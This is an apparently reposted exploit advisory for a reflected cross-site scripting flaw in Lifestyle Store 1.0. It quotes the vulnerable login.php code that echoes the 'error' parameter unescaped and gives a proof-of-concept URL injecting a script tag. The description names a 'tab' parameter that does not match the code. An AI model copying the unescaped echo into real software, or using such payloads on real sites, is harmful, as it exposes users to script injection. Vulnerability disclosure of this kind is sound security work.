Lifestyle Store 1.0 Cross Site Scripting ≈ Packet Storm

Roger Wilco Exploits 4 octobre 2021 Affichages : 294

# Exploit Title:  Lifestyle Store  (Online Shop Store) 1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2021-09-30
# Author: Abdulrahman https://twitter.com/infosec_90
# Software Link: https://download-media.code-projects.org/2021/07/Online_Shop_Store_In_PHP_With_Source_Code.zip
# Version: 1.0.0
# Tested on: Kali Linux
1. Description:
The tab parameter in the login.php is vulnerable to XSS.
2. login.php in line 43 code:
if(isset($_GET["error"])){
echo $_GET['error'];
}
3. Proof of Concept:
/online-shop/login.php?error=<script>print()</script>

WHAT ARE YOU LOOKING FOR?

Popular Tags

Lifestyle Store 1.0 Cross Site Scripting ≈ Packet Storm

Follow us on

Most popular

Tiki Wiki CMS Groupware 21.1 Authentication Bypass ≈ Packet Storm

Aimeos Laravel Ecommerce Platform 2021.10 LTS SQL Injection ≈ Packet Storm

Phone Shop Sales Managements System 1.0 Shell Upload ≈ Packet Storm

OpenSMTPD Out-Of-Bounds Read / Local Privilege Escalation ≈ Packet Storm

Monitorr 1.7.6m Authorization Bypass ≈ Packet Storm

Tomato: 1 Vulnhub Walkthrough

Category

Popular Sections

About